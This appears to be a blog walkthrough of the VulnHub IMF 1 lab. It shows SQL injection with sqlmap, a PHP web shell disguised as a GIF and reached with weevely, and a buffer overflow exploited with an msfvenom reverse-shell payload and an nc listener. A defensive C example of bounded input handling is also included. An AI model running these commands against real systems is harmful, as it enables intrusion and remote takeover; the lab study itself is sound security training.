Hello everyone. In this blog I am going to post a walkthrough of IMF 1.
This machine is a perfect example of a buffer overflow.
You can download the machine from this link: https://www.vulnhub.com/entry/imf-1,162/
Let's start.

Target IP: 192.168.75.139
Attacker IP: 192.168.75.175
Let's start with nmap:
nmap -Pn -sV 192.168.75.139

OK, there is one port open:
80 - http
Let's see what is running on port 80.

So now we check the page source.

So now we got our first flag (flag 1).
Now I use the decoder option in Burp Suite to decode the flag.

I got allthefiles.
On looking closely at the source of contact.php we found another hash.

Again we used the Burp decoder and found our next flag (flag 2).

On decoding that hash again we found /imfadministrator.

On checking /allthefiles nothing showed up.

But when I tried /imfadministrator, bingo, I got a login page asking for a username and password.

Then on checking the page source I found that it might be vulnerable to SQL injection.

So I used Burp Suite to exploit it.

I set the payloads and ran the attack, but nothing came up. It kept showing INVALID USER.

So on further enumeration, I found that there were 3 usernames.

So on testing them it was rmichaels, and I got the 3rd flag successfully.

On decoding the hash, it gave continue to cms.

So on going to cms.php I got access to the main site.

Now on running sqlmap (with the saved login request in the file sqli2) we got the databases:
sqlmap -r sqli2 --risk=3 --level=5 --dbs --dump --batch --threads=10

We got 4 databases.

In tutorials-incomplete we found a source ="./images/whiteborard.jpg".
On trying it we got an image.

Then we can see there is a QR code; on decoding it we got our next flag (flag 4).

On further decoding the hash of flag 4 we got upload942.php.

On going there we got a page with an upload form.

Now I uploaded a PHP file to get shell access,
but it seems that PHP is filtered.

So I tried to upload the malicious code as a GIF, and boom, it was a success. On checking the page source I found something interesting:
actually it was the same file (GIF) that we uploaded, but the server had changed its name to eb7e25c6b97d.

So now we used weevely to get a limited shell:
weevely http://192.168.75.139/imfadministrator/uploads/eb7e25c6b97d.gif test
And we got the limited shell.

On doing ls we got our next flag (flag 5).

On decoding it we got agentservices.

On searching for the name agent we found the file:
find / -name agent 2>/dev/null
/usr/local/bin/agent
On running it we got the IMF system, and it was asking for an agent ID that we don't have.

On listing the directory (ls) we found the access codes.

On reading the access codes file and the services file we found that port
7788 is also open, which we were not able to find during the normal nmap scan.

So we got 3 ports, so I tried knocking them so that we could find something useful.

So now we can see port 7788 is also open.
So now I used a tool called RetDec. It is basically a decompiler, so that we can decompile the IMF system (the agent binary) with RetDec.
You can download RetDec from this link: https://github.com/avast/retdec

So now to do that I transferred /usr/local/bin/agent to /root/retdec/bin/agent, so that RetDec can decompile the IMF system.

So as you can see we have got /root/retdec/bin, which contains the IMF system.

So, on executing decompiler.py we found the agent ID constant 0x2ddd984.
On echoing it with echo $((0x2ddd984)) I got the agent ID: 48093572

Now we chmod the agent to give it execute permission.
Now as we enter option 3 we see that it records the data that is input, so when I tried fuzzing it with 'A's I found a buffer overflow vulnerability in it.
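To show what the crash above means in code, here is an added example (written for this post, not the agent binary's real source, which is not on the page): a constructed stand-in for the "record data" option in its vulnerable shape and in a hardened shape that rejects over-long input. BUF_LEN, MAX_REPORT and the function names are assumptions.

```c
/* Constructed stand-in for the agent's "record data" option, added for this
 * walkthrough; the real source is not on the page, so sizes and names are assumed. */
#include <stdio.h>
#include <string.h>
#define BUF_LEN 64       /* assumed size of the fixed stack buffer */
#define MAX_REPORT 256   /* hard input cap enforced by the hardened version */
/* Vulnerable shape (for contrast only): input of any length is copied into a
 * fixed stack buffer. Anything past BUF_LEN overwrites adjacent stack data,
 * including the saved return address, which is the crash the 'A' fuzzing shows. */
void record_data_vulnerable(const char *input)
{
    char report[BUF_LEN];
    strcpy(report, input);                  /* unbounded copy */
    printf("Recorded %zu bytes\n", strlen(report));
}
/* Hardened shape: length checked before any copy, copy bounded by the
 * destination, result always NUL-terminated. Returns 0, or -1 if rejected. */
int record_data_safe(const char *input, char *out, size_t out_len)
{
    size_t n = strlen(input);
    if (n > MAX_REPORT || n >= out_len)
        return -1;                          /* reject, never truncate silently */
    memcpy(out, input, n);
    out[n] = '\0';
    return 0;
}
/* Bounded line reader: fgets() instead of gets()/scanf("%s"); a line that
 * does not fit is drained and rejected rather than partially accepted. */
int read_report_line(FILE *in, char *out, size_t out_len)
{
    char line[MAX_REPORT + 2];
    if (fgets(line, sizeof line, in) == NULL)
        return -1;
    char *nl = strchr(line, '\n');
    if (nl == NULL && !feof(in)) {          /* over-long line: drain it */
        int c; while ((c = getc(in)) != EOF && c != '\n') { }
        return -1;
    }
    if (nl) *nl = '\0';
    return record_data_safe(line, out, out_len);
}
int main(void)
{
    char stored[MAX_REPORT + 1];
    if (read_report_line(stdin, stored, sizeof stored) == 0)
        printf("Recorded: %s\n", stored);
    else
        puts("Input rejected");
    return 0;
}
```

Compile with -fstack-protector and run with a 300-character line to see the hardened path reject it while the vulnerable function would have smashed the stack.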

So, as is done for a buffer overflow, I created a pattern (locate pattern_create to find the script):
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200

So I used the gdb debugger that is built into Kali.
Just run gdb agent

Now on entering option 3 we enter the pattern that we created,
and found that the crash overwrote the return address with the pattern value 41366641, which gives us the exact offset.

So now we created a pattern with the same value (the offset).

Now using msfvenom I created a reverse shell and removed the bad characters ("\x00\x0a\x0d"):
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip of kali> LPORT=4448 -f python -b "\x00\x0a\x0d"

So I copied this shellcode into the exploit file that I downloaded online, and changed my IP and port (just google imf reverse shell).

Now on opening the listener using nc -nlvp 4448
and running the python file: python agentsploit.py ip port

We got root access!!
Writer: Shubhankar is a Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.